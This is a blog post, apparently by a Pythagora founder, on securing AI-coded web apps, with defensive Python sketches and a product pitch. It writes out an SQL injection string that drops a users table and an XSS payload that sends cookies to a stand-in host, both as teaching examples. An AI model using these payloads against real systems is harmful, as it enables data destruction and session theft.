How to secure AI-coded applications

Overview

For the past two years, I’ve been deep in the world of AI, building Pythagora and pushing it toward building production-ready applications. Recently, with the release of Claude Code with Sonnet 4, we’ve hit a turning point. You can now spin up really complex applications, complete with database operations, third-party integrations, and basically anything you can dream up, just by chatting. It feels like live coding with AI at your side.

Initially, my focus while working on Pythagora was on enabling people to build apps by chatting, and on what the UX should look like. Now, my attention has shifted to something more important: how do we actually secure web apps once they’re built? For this, I believe we need a mindset shift. Security isn’t something we can just offload to AI or abstract away—it has to stay firmly in human hands.

Last year, Pythagora was the target of multiple hacker attacks, both on our own systems and on the systems of vendors we used. When one of our vendors got hacked, the attackers obtained our OpenAI API key and used over $30k worth of tokens.

After seeing vibe-coded apps get exploited, as in the case where a Lovable-built app exposed all of its users' data to everyone, I wanted to find out how we could ensure that apps built with Pythagora are secure.

So, I embarked on a journey to map out all potential vulnerabilities and see how we can enable less technical builders to build completely secure applications.

In this post, I'll share what I've learned about security in no-code apps, but also what we actually did as a team. We’ll look at some real examples of vulnerabilities that pop up, and then I’ll walk you through my solution for making vibe-coded applications truly secure. Secure enough that you could confidently build business-critical systems with nothing but vibe coding.

Web app vulnerabilities

We can segment vulnerabilities into the following categories:



1. Insecure HTTP connection - today, HTTPS is a table-stakes security measure, and most websites have it by default. If you open a website whose address starts with http:// instead of https://, your browser will clearly warn you that the site is insecure, and any data you enter on it can be intercepted and read by an attacker. HTTPS websites, in contrast, encrypt the data in transit, so anyone who intercepts it sees only gibberish.




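On the server side, the usual pattern is to redirect every http:// request to its https:// equivalent and to send the Strict-Transport-Security (HSTS) header, which tells browsers to use HTTPS for the site from then on. This normally lives in the web server, load balancer, or hosting platform; the sketch below expresses the same idea as Python WSGI middleware so the logic is visible. All function names are hypothetical, and the HSTS max-age is just a common choice.

```python
# Hypothetical names throughout; one year is a common HSTS max-age.
HSTS_VALUE = "max-age=31536000; includeSubDomains"


def force_https(app):
    """Wrap a WSGI app: redirect plain HTTP to HTTPS, add HSTS to HTTPS responses."""
    def middleware(environ, start_response):
        # Behind a reverse proxy the original scheme usually arrives in
        # X-Forwarded-Proto; only trust it if a proxy you control sets it.
        scheme = environ.get("HTTP_X_FORWARDED_PROTO") or environ.get("wsgi.url_scheme", "http")
        if scheme != "https":
            host = environ.get("HTTP_HOST", "localhost")
            path = environ.get("PATH_INFO", "/")
            query = environ.get("QUERY_STRING", "")
            location = f"https://{host}{path}" + (f"?{query}" if query else "")
            start_response("301 Moved Permanently", [("Location", location)])
            return [b""]

        def start_with_hsts(status, headers, exc_info=None):
            # Tell the browser to use HTTPS for this host from now on.
            headers = list(headers) + [("Strict-Transport-Security", HSTS_VALUE)]
            return start_response(status, headers, exc_info)

        return app(environ, start_with_hsts)
    return middleware


def hello_app(environ, start_response):
    """Stand-in for the real application."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello"]


def call(app, environ):
    """Tiny test harness: run a WSGI app and return (status, headers, body)."""
    seen = {}
    def start_response(status, headers, exc_info=None):
        seen["status"], seen["headers"] = status, dict(headers)
    body = b"".join(app(environ, start_response))
    return seen["status"], seen["headers"], body


app = force_https(hello_app)
print(call(app, {"wsgi.url_scheme": "http", "HTTP_HOST": "example.com", "PATH_INFO": "/login"}))
```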

2. Authentication - this is the first crucial part of making a web app secure. All AI coding tools seem to have it covered, but when AI builds something for you and you don't check every single line of code, how do you make sure authentication is 100% secure? Take a look at the screenshot below: if AI hallucinates just one line of code and removes the requireAdmin check, you expose all your customers to any crawler scanning the internet.
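To make that failure mode concrete, here is a minimal Python sketch of the pattern most frameworks use: a check such as requireAdmin runs before the route handler. The names (require_admin, list_customers, the request dictionary) are hypothetical. Notice that the protection hangs on a single decorator line per route, so an edit that drops it fails silently: nothing breaks, the route just becomes public.

```python
from functools import wraps


class Forbidden(Exception):
    """Raised when the caller is not allowed to use a route."""


def require_admin(handler):
    """Hypothetical guard: only logged-in admins reach the handler."""
    @wraps(handler)
    def guarded(request):
        user = request.get("user")  # set by the auth layer; None if not logged in
        if user is None or user.get("role") != "admin":
            raise Forbidden("admin only")
        return handler(request)
    return guarded


CUSTOMERS = [{"name": "Ada", "email": "ada@example.com"}]  # made-up data


@require_admin  # the single line that keeps this route private
def list_customers(request):
    return CUSTOMERS


# The same handler after an AI edit dropped the decorator: no error, no
# failing build, the customer list is simply served to anyone.
def list_customers_unprotected(request):
    return CUSTOMERS


def is_blocked(handler, request):
    """Return True if the handler refused the request."""
    try:
        handler(request)
        return False
    except Forbidden:
        return True


print(is_blocked(list_customers, {"user": None}))              # True
print(is_blocked(list_customers_unprotected, {"user": None}))  # False
```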

Imagine you create a page that anyone can access (e.g. the home page) and list your teammates' names on it. Before deploying the app, you remove this page so that no one can see who works at your company. But removing the page doesn't remove the API endpoint behind it, so anyone can still request the employee data directly.


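One cheap safeguard is to audit the route table rather than the pages: list every registered endpoint that can be reached without logging in and compare it with an explicit allowlist, so an orphaned endpoint still shows up after its page is gone. A minimal sketch with a hypothetical in-memory router (real frameworks expose their route tables in their own ways):

```python
from dataclasses import dataclass, field
from typing import Callable


@dataclass
class Route:
    path: str
    handler: Callable
    requires_auth: bool


@dataclass
class Router:
    """Hypothetical router, used only to illustrate the audit."""
    routes: list = field(default_factory=list)

    def add(self, path, handler, requires_auth=True):
        # Private by default: a route is public only if explicitly marked so.
        self.routes.append(Route(path, handler, requires_auth))

    def public_routes(self):
        """Every path an unauthenticated visitor can reach."""
        return [r.path for r in self.routes if not r.requires_auth]


router = Router()
router.add("/", lambda req: "home page", requires_auth=False)
# Left over from the deleted "team" page: still registered, still public.
router.add("/api/employees", lambda req: ["Alice", "Bob"], requires_auth=False)
router.add("/api/invoices", lambda req: [])

ALLOWED_PUBLIC = {"/"}  # routes someone has explicitly signed off as public
unexpected = [p for p in router.public_routes() if p not in ALLOWED_PUBLIC]
print(unexpected)  # ['/api/employees']
```

Making routes private by default, as add() does here, means a forgotten endpoint fails closed rather than open.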

3. Authorization (access control) - once you are sure that no one outside the company can access your app, you must ensure that people within the company can't access data they shouldn't see.

For example, in an HR management app, you MUST NOT allow every employee to see the pay slips HR has issued to other employees.
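Authorization has to be checked per record, not just per route: every employee may be allowed to call the pay-slip endpoint, but each should only get their own slips back, while HR sees everyone's. A minimal sketch of such a check, filtering on the server; the roles, fields, and sample data are hypothetical:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # hypothetical roles: "employee" or "hr"


@dataclass(frozen=True)
class PaySlip:
    employee_id: int
    month: str
    net_pay: int


# Made-up sample data.
PAY_SLIPS = [
    PaySlip(employee_id=1, month="2025-05", net_pay=4200),
    PaySlip(employee_id=2, month="2025-05", net_pay=5100),
]


def can_view(user: User, slip: PaySlip) -> bool:
    """HR sees every slip; everyone else sees only their own."""
    return user.role == "hr" or slip.employee_id == user.id


def pay_slips_for(user: User) -> list:
    # Filter on the server; never send every slip and let the frontend hide some.
    return [s for s in PAY_SLIPS if can_view(user, s)]


print(len(pay_slips_for(User(id=1, role="employee"))))  # 1
print(len(pay_slips_for(User(id=9, role="hr"))))        # 2
```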

4. Codebase vulnerabilities - there is a whole list of potential codebase vulnerabilities - here are a few of the most important ones:

- Compromised libraries - the entire web stack is built on top of libraries (code packages that other people built), most of which are open source. Using open-source libraries is convenient, but it also gives hackers full insight into how each library works, which makes its weaknesses easier to find. On top of that, a library's developer might deliberately introduce a vulnerability (e.g. a back door that lets hackers into any app that uses the library). You might have nothing to do with this library and may not even know you're using it (it could be a dependency of a library you installed), but you are still affected.

- Sensitive data exposure - if you're not careful about how your backend is structured, it might expose some of your API keys to your users (no hacker required). If a user finds your API key, they can run up a massive bill on the service it belongs to (e.g. if you use an OpenAI API key for LLM requests).

- Injections - if the codebase is not structured correctly, user input can end up being executed on the server. The most famous example is SQL injection. If your code pastes a user's input field directly into an SQL query and someone enters x'); DROP TABLE users; -- as their email, the server ends up running

INSERT INTO users (email) VALUES ('x'); DROP TABLE users; --')

which deletes your entire users table (a DROP DATABASE payload would delete the whole database). A similar case happened in an app coded with Replit.
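The standard defense is to never build SQL by pasting strings together and to pass user input as query parameters instead, so the database treats it strictly as a value. A minimal sketch with Python's built-in sqlite3 module; the table and the malicious input are made up for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT)")

malicious = "x'); DROP TABLE users; --"  # made-up attacker input

# Vulnerable: the input becomes part of the SQL text itself.
# (Shown only as a string; never execute SQL built like this.)
unsafe_sql = f"INSERT INTO users (email) VALUES ('{malicious}')"
print(unsafe_sql)
# INSERT INTO users (email) VALUES ('x'); DROP TABLE users; --')

# Safe: the ? placeholder sends the input separately, as plain data.
conn.execute("INSERT INTO users (email) VALUES (?)", (malicious,))
conn.commit()

stored = conn.execute("SELECT email FROM users").fetchall()
print(stored)  # [("x'); DROP TABLE users; --",)]
```

The table survives, and the attack string is stored as an ordinary (if odd) email address.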

AI writes A TON of code

Everyone knows that AI writes far more code than a human would for the same task. It's true that AI often writes more than was asked of it, but that code isn't necessarily bad; it's much better than a lot of human-written code I've reviewed. The extra lines are mostly logging, error handling, and additional helper functions.

Pythagora can easily write 10k lines of code (LOC) in a day of work, which is essentially impossible for humans to review. As LLMs get faster, we're likely looking at 50k LOC a day. So how do we manage all this new code?

It's clear that AI can write working code, so we need to find a way to live in this new world where producing 50k working LOC a day is actually possible.

We shouldn't look for ways to review all those lines of code or reduce the number of lines, but rather, we should find a way to secure AI coded apps without having to review every single line of code regardless of how much code AI writes.

Hallucinations

In reality, the problem is not the amount of code but hallucinations. Imagine that AI misses one crucial line of code. In the example shown earlier, simply by removing requireAdmin, AI exposed all of a company's customers to the public.

So, the question is...

How to use vibe coded apps for business

For me to trust an AI coded app, the first requirement is that I need to be 100% sure that my data is safe. That is 100% - not 99%.

When we first started building internal apps at Pythagora, I felt that anxiety firsthand. I kept worrying about whether there were any exposed endpoints. I didn't just want to see the app working; I wanted to be 100% sure that our users' data was secure.

The anxiety only grew when someone else on the team, especially someone less technical, built a tool that used our users' data. So I started to think about what it would take for me to trust an app that Pythagora wrote.

You want to offload coding to AI, but keep security in human hands

If I could be 100% sure that the data cannot be leaked or mismanaged, I would not need anyone from my team to review the code that AI built and I would approve any tool release that makes sense.

The key word in the sentence above is "100%", which AI cannot provide, so humans have to guarantee at least one part: security.

Over the past few months, I put together a set of security layers that, once in place, would give me the confidence to approve the release of a tool within my team.

These layers should ensure that, regardless of what AI writes, our data remains secure without requiring a review of every single line of code.

✅ 1. Isolate the codebase from non-authenticated users

- Vulnerable use cases:

  - API endpoint ends up being exposed to the world

  - AI hallucinates and removes access control from an API endpoint

  - A human creates a publicly available page with sensitive data, then removes the page, but doesn't remove the API endpoint

The first step is to isolate our AI-coded apps from anyone outside the team. That means every API request must already be authenticated before it reaches the codebase. An unauthenticated request MUST NOT trigger even a single line of the app's code.

This can be done by enforcing authentication on the infrastructure layer.



Virtually all vibe-coding tools embed authentication in the AI-generated code, which means that AI can modify the authentication and potentially break it. If it hallucinates in the wrong place, it can expose our entire system to hackers.

In contrast, I wanted to be sure that authentication works regardless of what AI generates. This is where the idea for Pythagora's isolated security system came from. In it, authentication isn't implemented in the AI-generated codebase but in the reverse proxy (specifically NGINX) that sits in front of the applications on the server and authenticates the user before the API request is allowed to reach the app. This way, it doesn't matter what happens in the codebase: a user who is not authenticated cannot even reach the app that someone from your team vibe-coded.

In other words, Pythagora's security system completely isolates all your AI-coded apps from anyone who is not authenticated.
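What matters is the ordering: the authentication check runs outside the app, and an unauthenticated request is answered before any app code executes. Pythagora does this in NGINX; the sketch below only illustrates the same idea as Python WSGI middleware wrapped around a stand-in app. The session store, the cookie name, and all function names are assumptions, not Pythagora's implementation.

```python
from http.cookies import SimpleCookie

VALID_SESSIONS = {"s3cr3t-session-id"}  # hypothetical session store
app_calls = []  # records every time the app's own code actually runs


def vibe_coded_app(environ, start_response):
    """Stand-in for the AI-generated app; assume nothing about its auth."""
    app_calls.append(environ.get("PATH_INFO"))
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"employee data"]


def auth_gate(app):
    """Reject requests without a valid session before they reach the app."""
    def gate(environ, start_response):
        cookie = SimpleCookie(environ.get("HTTP_COOKIE", ""))
        session = cookie["session"].value if "session" in cookie else None
        if session not in VALID_SESSIONS:
            # Answered here: not a single line of the app runs.
            start_response("401 Unauthorized", [("Content-Type", "text/plain")])
            return [b"login required"]
        return app(environ, start_response)
    return gate


def call(app, environ):
    """Tiny test harness: run a WSGI app and return (status, body)."""
    seen = {}
    def start_response(status, headers, exc_info=None):
        seen["status"] = status
    body = b"".join(app(environ, start_response))
    return seen["status"], body


protected = auth_gate(vibe_coded_app)
```

Because the gate wraps the app instead of living inside it, nothing the AI changes in vibe_coded_app can remove the check.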

Here is a video in which I go deeper into the details about how it works.

How Pythagora's security system works?

🟡 2. Transparent data access

- Vulnerable use cases:

  - Data is accessible to users within the company who shouldn't have access to that data

  - AI coded app creates a destructive database query

For me to allow anyone less technical to deploy an app inside Pythagora, I need to be 100% confident about what happens on the backend of this app.

Today, every vibe-coded backend is a black box: unless you do a full code review of the entire app, you don't know what happens there.

Code review is unrealistic for AI-coded apps, since you can knock out tens of thousands of LOC within a day, and a human reviewer would need at least another full day to get through them. That's why we need to think differently.

We can still let humans review what the app is doing without going through every single LOC. For that, we need to pin down what we actually want to check in a code review:

- API endpoints - which user has access to which endpoints

- Database queries - what DB queries are made within which API endpoint

- 3rd party requests - which API endpoints trigger which 3rd party requests, and what data they send
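Much of this information can be collected automatically instead of read from the code. As a rough sketch of the idea (not how Pythagora's visualization is built), Python's sqlite3 module reports every statement it executes through Connection.set_trace_callback, which is enough to build a per-endpoint query manifest and flag destructive statements for a human to look at. The endpoint names and the DESTRUCTIVE keyword list are assumptions; third-party requests could be recorded the same way by routing them through a single logging wrapper.

```python
import sqlite3
from collections import defaultdict

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE employees (id INTEGER, name TEXT)")

manifest = defaultdict(list)  # endpoint -> SQL statements it executed
current_endpoint = None


def record(statement):
    # Called by sqlite3 for every statement the backend executes.
    if current_endpoint is not None:
        manifest[current_endpoint].append(statement)


conn.set_trace_callback(record)


def run_endpoint(name, handler):
    """Run a handler and attribute every SQL statement it executes to it."""
    global current_endpoint
    current_endpoint = name
    try:
        return handler()
    finally:
        current_endpoint = None


DESTRUCTIVE = ("DROP", "DELETE", "ALTER", "UPDATE")  # assumed review triggers


def flagged(manifest):
    """Endpoints whose queries a human should look at before release."""
    return sorted(
        endpoint for endpoint, statements in manifest.items()
        if any(s.lstrip().upper().startswith(DESTRUCTIVE) for s in statements)
    )


# Hypothetical endpoints.
run_endpoint("GET /api/employees",
             lambda: conn.execute("SELECT id, name FROM employees").fetchall())
run_endpoint("POST /api/cleanup",
             lambda: conn.execute("DROP TABLE employees"))
print(flagged(manifest))  # ['POST /api/cleanup']
```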

Here is a backend visualization that enables you to easily view all backend endpoints and understand the functionality of each one.

🟡 3. Codebase vulnerabilities

- Vulnerable use cases:

  - The library that AI installed gets compromised

  - AI creates code that's vulnerable to SQL injection

  - AI creates code that leaks an API key
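A common mitigation for compromised libraries is to pin every dependency, including indirect ones, to an exact version and a cryptographic hash in a lockfile, and to refuse anything that doesn't match; pip's --require-hashes mode and the integrity field in npm's package-lock.json work this way. That stops a tampered release from slipping in silently, though it can't help if the version you pinned was already malicious. A minimal sketch of the check itself, with a hypothetical package name and lockfile:

```python
import hashlib


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Hypothetical lockfile: "package==version" -> SHA-256 of the vetted artifact.
ORIGINAL_ARTIFACT = b"def helper():\n    return 42\n"
LOCKFILE = {"some-lib==1.3.0": sha256_of(ORIGINAL_ARTIFACT)}


def verify(package: str, artifact: bytes) -> None:
    """Refuse an artifact that is unpinned or doesn't match its pinned hash."""
    expected = LOCKFILE.get(package)
    if expected is None:
        raise ValueError(f"{package} is not pinned in the lockfile")
    if sha256_of(artifact) != expected:
        raise ValueError(f"hash mismatch for {package}: possible tampering")


def is_accepted(package: str, artifact: bytes) -> bool:
    try:
        verify(package, artifact)
        return True
    except ValueError:
        return False


# The same version number, but someone slipped extra code into the package.
tampered = ORIGINAL_ARTIFACT + b"# injected back door\n"

print(is_accepted("some-lib==1.3.0", ORIGINAL_ARTIFACT))  # True
print(is_accepted("some-lib==1.3.0", tampered))           # False
```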

These vulnerabilities are mostly caught by static code analysis, and some platforms already scan for them automatically. GitHub is one example: its secret scanning can block a push that contains a recognized API key, and Dependabot alerts you when one of your dependencies has a known vulnerability.
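At its core, secret scanning is pattern matching over source files before they are pushed or deployed. Real scanners such as GitHub's ship patterns for many providers; the sketch below uses one deliberately simplified regular expression for keys starting with sk- (the prefix OpenAI secret keys use) and also reports whether the key sits in code that gets shipped to the browser. The pattern, file paths, and FRONTEND_DIRS convention are assumptions for illustration.

```python
import re

# Simplified, assumed pattern: "sk-" followed by a long run of key-like characters.
SECRET_PATTERN = re.compile(r"\bsk-[A-Za-z0-9_-]{20,}")
# Hypothetical convention: code under these folders is shipped to browsers.
FRONTEND_DIRS = ("client/", "frontend/", "public/")


def scan(files: dict) -> list:
    """Return (path, reason) findings for a {path: source} mapping."""
    findings = []
    for path, source in files.items():
        for match in SECRET_PATTERN.finditer(source):
            where = "frontend bundle" if path.startswith(FRONTEND_DIRS) else "source"
            # Print only a short prefix so the report doesn't leak the key again.
            findings.append((path, f"hard-coded key in {where}: {match.group()[:6]}..."))
    return findings


files = {
    # Fine: the key is read from the server's environment at runtime.
    "server/llm.py": 'client = OpenAI(api_key=os.environ["OPENAI_API_KEY"])',
    # Leaked: a (fake) key hard-coded into code every visitor downloads.
    "client/src/chat.ts": 'const key = "sk-proj-abcdefghijklmnopqrstuvwx";',
}
print(scan(files))
```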

This is the part that will come last on the roadmap and will perform the following checks before an app is deployed:

- Static code analysis.

- Automated pen test scan.

- AI codebase scan by Pythagora's security agent, powered by Claude Code. It looks for the following vulnerabilities:

  - Injections (SQL, OS, LDAP) - check for places that let a user inject, for example, an SQL query that will automatically be run

  - Secret keys exposure - check whether secret keys are propagated beyond the places where they need to be used, and whether any secret key reaches the frontend.

  - Cross-site scripting (XSS) and insecure deserialization - check for any places where user-supplied data (e.g. a user name) can end up being executed.
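For XSS, the core fix is to escape user-supplied text before inserting it into HTML, so the browser displays it instead of running it. Most template engines do this by default, which is why code that bypasses them deserves a closer look. A minimal sketch with Python's standard html.escape; the render functions are hypothetical:

```python
import html


def render_greeting_unsafe(user_name: str) -> str:
    # Vulnerable: the name is inserted into the page as raw HTML.
    return f"<p>Hello, {user_name}!</p>"


def render_greeting(user_name: str) -> str:
    # Safe: <, >, &, and quotes become HTML entities, so nothing executes.
    return f"<p>Hello, {html.escape(user_name)}!</p>"


# A made-up malicious "user name" that tries to steal cookies.
name = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
print(render_greeting_unsafe(name))  # the script tag survives intact
print(render_greeting(name))         # the script tag is shown as text
```

The same principle applies to deserialization: parse untrusted input with a data-only format such as JSON rather than a format like Python's pickle, which can execute code while loading.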

Approval process - code review is outdated in the world of AI

Fully securing an application takes more than the security measures themselves; technical leaders also need to be confident in the software being deployed within their organization. The final step is to set up an approval process that lets leaders review the changes made, such as new API endpoints and database queries, and sign off on the release. We still have some way to go before we reach this point, but it is coming: Pull Requests in GitHub will soon become obsolete in the world of AI.
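If the backend is summarized as a manifest (which endpoints exist, who may call them, and which queries they run), the approval step can review a diff of two manifests instead of thousands of changed lines. A minimal sketch, assuming a hypothetical manifest format that maps each endpoint to its allowed roles and queries:

```python
def manifest_diff(old: dict, new: dict) -> list:
    """List the security-relevant changes a reviewer must sign off on."""
    changes = []
    for endpoint in sorted(new.keys() - old.keys()):
        changes.append(f"ADDED {endpoint}")
    for endpoint in sorted(old.keys() - new.keys()):
        changes.append(f"REMOVED {endpoint}")
    for endpoint in sorted(old.keys() & new.keys()):
        before, after = old[endpoint], new[endpoint]
        if before["roles"] != after["roles"]:
            changes.append(f"ACCESS CHANGED {endpoint}: {before['roles']} -> {after['roles']}")
        if before["queries"] != after["queries"]:
            changes.append(f"QUERIES CHANGED {endpoint}")
    return changes


# Made-up manifests for two releases of the same app.
release_1 = {
    "GET /api/customers": {"roles": ["admin"], "queries": ["SELECT * FROM customers"]},
}
release_2 = {
    "GET /api/customers": {"roles": ["public"], "queries": ["SELECT * FROM customers"]},
    "POST /api/notes": {"roles": ["member"], "queries": ["INSERT INTO notes (body) VALUES (?)"]},
}

for change in manifest_diff(release_1, release_2):
    print(change)
```

In this made-up example, the reviewer would immediately see that the customers endpoint went from admin-only to public, which is exactly the kind of change a missing requireAdmin line causes.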

Conclusion

In this blog post, we explored typical web app vulnerabilities and how we can defend against them at a time when AI writes so much code that it's impossible for humans to verify every single line.

My goal is to start a discussion about what is needed in order to secure AI coded applications and how we can bring vibe coding into business critical use cases.

If you have any thoughts on this, I would love to hear from you either in the comments below or by reaching me at zvonimir@pythagora.ai.

If you haven't yet, check out our product, Pythagora. It gives you the power to build astonishing tools, not just demos, within a few hours of chatting with AI. From today, you can deploy your apps securely and be assured that your data is safe.